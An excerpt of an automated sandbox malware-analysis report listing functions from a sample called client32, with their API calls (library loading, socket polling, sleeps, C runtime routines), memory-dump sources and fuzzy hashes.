                                                                                  • Instruction ID: 730b98e398c0589ce7e550b9bc84109b73a11ee320166aeb4031b7539001f245
                                                                                  • Opcode Fuzzy Hash: 24a20829d709380053b4af4aa97fdf324579931aab82e66f2f636079b6ea2ebc
                                                                                  • Instruction Fuzzy Hash: 82E009B1901B108FC3B0CF399504642BAF0BB096553118A2E909EC3A10E334A585CF80
                                                                                  Function 11015530 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102F63D,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1101553E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: nslsp.dll
                                                                                  • API String ID: 1029625771-3933918195
                                                                                  • Opcode ID: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                                  • Instruction ID: c3cee1b6b22d45073264887edccfc8dbbb46eef3a7360ad418ef0f3f90be1ef1
                                                                                  • Opcode Fuzzy Hash: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                                  • Instruction Fuzzy Hash: BBC08C702006245BE3900F48BC04081F694AF04900300882AE070C3600D160A8008F80
                                                                                  Function 11075090 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 110750EF
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary_memset
                                                                                  • String ID:
                                                                                  • API String ID: 1654520187-0
                                                                                  • Opcode ID: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                  • Instruction ID: 75615663fc9b5e204bff5cdf828812fccbd9a8c0715bb2e01743ee940980502e
                                                                                  • Opcode Fuzzy Hash: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                  • Instruction Fuzzy Hash: 28219276E01268A7D710DE95EC41BEFBBBCFB44315F4041AAE90997200EB729A50CBE1
                                                                                  Function 6F9F5C90 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ioctlsocket.WSOCK32(905C34B3,4004667F,00000000,-000397EB), ref: 6F9F5D1F
                                                                                  • select.WSOCK32(00000001,?,00000000,?,00000000,905C34B3,4004667F,00000000,-000397EB), ref: 6F9F5D62
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ioctlsocketselect
                                                                                  • String ID:
                                                                                  • API String ID: 1457273030-0
                                                                                  • Opcode ID: 32d03d468236e13749af959ca9f77d671a2fc83cc8dd2ee34afb9bd8cb314303
                                                                                  • Instruction ID: f66ae27464692933dceaf31495b6ce2965d101d6af39499d4e2c7c98887a02ea
                                                                                  • Opcode Fuzzy Hash: 32d03d468236e13749af959ca9f77d671a2fc83cc8dd2ee34afb9bd8cb314303
                                                                                  • Instruction Fuzzy Hash: 00210E71A013189BEB28CF18C9547EDB7B9EF48304F01C1DAA80997291DB74AF94DF90
                                                                                  Function 11060820 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • std::exception::exception.LIBCMT ref: 110608C3
                                                                                  • __CxxThrowException@8.LIBCMT ref: 110608D8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1338273076-0
                                                                                  • Opcode ID: f53edd8a3547965c10928d98d0274f9b7efb0488a05ac9eb6089c88382d9505c
                                                                                  • Instruction ID: 40c1b550870c83f0c669b419c7937a1de5292af9ae005a9ffb354a33ebb971cd
                                                                                  • Opcode Fuzzy Hash: f53edd8a3547965c10928d98d0274f9b7efb0488a05ac9eb6089c88382d9505c
                                                                                  • Instruction Fuzzy Hash: F11181BA900609AFC715CF99C840ADAF7F8FB58614F10863EE91997740E774E904CBE1
                                                                                  Function 1105F7C0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _malloc_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 1183979061-0
                                                                                  • Opcode ID: a0fd6cf0859f8b509b93e1be4e4e9f90a43601b5ffba7b92da29534491e0d66c
                                                                                  • Instruction ID: e8b2e2ab67b960fffb59418ca6d045486158c88f9a02fc8ea8f4f968a4d4dde1
                                                                                  • Opcode Fuzzy Hash: a0fd6cf0859f8b509b93e1be4e4e9f90a43601b5ffba7b92da29534491e0d66c
                                                                                  • Instruction Fuzzy Hash: A3F02879A002566F8701CF2C9844897FBDCEF4A25831480A6E849CB302D671EC15C7F0
                                                                                  Function 110886C0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 110886DF
                                                                                  • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalInitializeSection_memset
                                                                                  • String ID:
                                                                                  • API String ID: 453477542-0
                                                                                  • Opcode ID: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                  • Instruction ID: 67e0870afe33de0d146d23e59662f9f8cfec19dbcaf4764f519a7c8a3238bf1f
                                                                                  • Opcode Fuzzy Hash: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                  • Instruction Fuzzy Hash: CC1157B1901B148FC3A4CF7A99816C3FAE5BB58354F90892E95EEC2600DB756564CF90
                                                                                  Function 11145010 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
                                                                                  • ExtractIconExA.SHELL32(?,00000000,00020453,00020461,00000001), ref: 11145068
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExtractFileIconModuleName
                                                                                  • String ID:
                                                                                  • API String ID: 3911389742-0
                                                                                  • Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                  • Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
                                                                                  • Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                  • Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741
                                                                                  Function 11164C77 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                  • __lock_file.LIBCMT ref: 11164CBE
                                                                                    • Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E
                                                                                  • __fclose_nolock.LIBCMT ref: 11164CC9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 2800547568-0
                                                                                  • Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                  • Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
                                                                                  • Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                  • Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46
                                                                                  Function 6FA06C1E Relevance: 3.0, APIs: 2, Instructions: 30sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 6FA06C26
                                                                                  • Sleep.KERNEL32(00000064), ref: 6FA06C5B
                                                                                    • Part of subcall function 6FA06940: GetTickCount.KERNEL32 ref: 6FA06950
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CountTick$Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 4250438611-0
                                                                                  • Opcode ID: 4d0de41c783a87a321e98a65f9e0295b613237ff59179cafe58a3bf4f3353a93
                                                                                  • Instruction ID: 47196906f946b2cf5de388dc1f1c61257249c76ac37dd43267ecc97bce6b5705
                                                                                  • Opcode Fuzzy Hash: 4d0de41c783a87a321e98a65f9e0295b613237ff59179cafe58a3bf4f3353a93
                                                                                  • Instruction Fuzzy Hash: DAF03033A14B048BCF24EE74BE54758B292DB5336DF15812BC512D5B90C778A8E2C741
                                                                                  Function 1117602D Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __lock.LIBCMT ref: 11176045
                                                                                    • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
                                                                                    • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
                                                                                    • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                                  • __tzset_nolock.LIBCMT ref: 11176056
                                                                                    • Part of subcall function 1117594C: __lock.LIBCMT ref: 1117596E
                                                                                    • Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
                                                                                    • Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
                                                                                    • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
                                                                                    • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
                                                                                    • Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
                                                                                    • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
                                                                                    • Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
                                                                                    • Part of subcall function 1117594C: __invoke_watson.LIBCMT ref: 11175A55
                                                                                    • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                  • String ID:
                                                                                  • API String ID: 1828324828-0
                                                                                  • Opcode ID: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                  • Instruction ID: d808ca63efd1e9ffab5fb640758e365785c4d1c524b5d003c7d68937386cb31b
                                                                                  • Opcode Fuzzy Hash: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                  • Instruction Fuzzy Hash: 7AE05B7E8877B3DAE7139FB4469060CF670AB05B3EF6011E5D060556C4CF701555C792
                                                                                  Function 6F9F63A0 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSACancelBlockingCall.WSOCK32 ref: 6F9F63A9
                                                                                  • Sleep.KERNEL32(00000032), ref: 6F9F63B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3455216978.000000006F9F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F9F0000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3455109046.000000006F9F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455268968.000000006FA30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455302973.000000006FA39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455345140.000000006FA3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3455462215.000000006FA40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_6f9f0000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: BlockingCallCancelSleep
                                                                                  • String ID:
                                                                                  • API String ID: 3706969569-0
                                                                                  • Opcode ID: 124b45a39b9c3c69db165657b258e44cd1f9e7057d74df559a397c66610fba36
                                                                                  • Instruction ID: 08e29cbc6c890af0e8801b20fe8a7b6474464d8c815e1d13b57c3fc82b3cc787
                                                                                  • Opcode Fuzzy Hash: 124b45a39b9c3c69db165657b258e44cd1f9e7057d74df559a397c66610fba36
                                                                                  • Instruction Fuzzy Hash: 96B012703933114BEF0013710E0636A20CC0FE725FF5584603A41C84CAFFA0C102E221
                                                                                  Function 11145A70 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                    • Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA
                                                                                  • GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                  • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
